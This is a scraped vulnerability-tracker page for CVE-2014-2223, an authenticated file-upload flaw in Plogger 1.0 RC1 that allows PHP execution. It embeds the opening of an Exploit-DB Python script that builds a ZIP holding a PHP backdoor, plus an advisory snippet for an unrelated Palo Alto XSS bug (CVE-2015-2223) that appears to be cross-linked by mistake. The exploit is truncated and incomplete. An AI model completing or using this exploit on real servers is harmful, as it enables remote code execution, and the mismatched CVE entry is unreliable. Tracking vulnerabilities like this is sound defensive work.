CVE-2014-2223
published 2014-09-11CVE-2014-2223: Unrestricted file upload vulnerability in plog-admin/plog-upload.php in Plogger 1.0 RC1 and earlier allows remote authenticated users to execute arbitrary code…
PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
10.02%
95.0th percentile
Unrestricted file upload vulnerability in plog-admin/plog-upload.php in Plogger 1.0 RC1 and earlier allows remote authenticated users to execute arbitrary code by uploading a ZIP file that contains a PHP file and a non-zero length PNG file, then accessing the PHP file via a direct request to it in plog-content/uploads/archive/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| plogger | plogger | <= 1.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting
exploitdb·2015-03-31·CVSS 4.3
CVE-2015-2223 [MEDIUM] Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting
Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting
---
#!/usr/bin/ruby
=begin
Product: Palo Alto Traps Server (formerly Cyvera Endpoint Protection)
Vendor: Palo Alto Networks
Vulnerable Version(s): 3.1.2.1546
Tested Version: 3.1.2.1546
Advisory Publication: 29 March 2015
Vendor Notification: 17 October 2014
Vulnerability Type: Stored Cross Site Scripting
CVE Reference: CVE-2015-2223
Risk Level: High
Solution Status:
Discovered and Provided: Michael Hendrickx, help AG
About the product:
Palo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this “trap” to a central server for logging purposes.
About the vulnerability:
An attacker
Exploit-DB
Plogger 1.0-RC1 - (Authenticated) Arbitrary File Upload
exploitdb·2014-08-28
CVE-2014-2223 Plogger 1.0-RC1 - (Authenticated) Arbitrary File Upload
Plogger 1.0-RC1 - (Authenticated) Arbitrary File Upload
---
#!/usr/bin/env python
# Exploit Title: Plogger Authenticated Arbitrary File Upload
# Date: Feb 2014
# Exploit Author: b0z
# Vendor Homepage: www.plogger.org
# Software Link: www.plogger.org/download
# Version: Plogger prior to 1.0-RC1
# CVE : 2014-2223
import hashlib
import os
import zipfile
import requests
import time
import argparse
def login(session,host,username,password):
print "[+] Log in"
session.post('http://%s/plog-admin/plog-upload.php' % host, data={
"plog_username": username,
"plog_password": password,
"action": "log_in"
})
def upload(session):
print "[+] Creating poisoned gift"
## Write the backdoor
backdoor = open(magic + '.php', 'w+', buffering = 0)
backdoor.write("")
backdoor.close
# Add true image file
No writeups or analysis indexed.
http://packetstormsecurity.com/files/128029/Plogger-Authenticated-Arbitrary-File-Upload.htmlhttp://seclists.org/oss-sec/2014/q1/443http://seclists.org/oss-sec/2014/q1/446http://www.exploit-db.com/exploits/34447https://www.sysdream.com/CVE-2014-2223_CVE-2014-2224https://www.sysdream.com/system/files/PLOGGER-1.0RC1-advisory.pdfhttp://packetstormsecurity.com/files/128029/Plogger-Authenticated-Arbitrary-File-Upload.htmlhttp://seclists.org/oss-sec/2014/q1/443http://seclists.org/oss-sec/2014/q1/446http://www.exploit-db.com/exploits/34447https://www.sysdream.com/CVE-2014-2223_CVE-2014-2224https://www.sysdream.com/system/files/PLOGGER-1.0RC1-advisory.pdf
2014-09-11
Published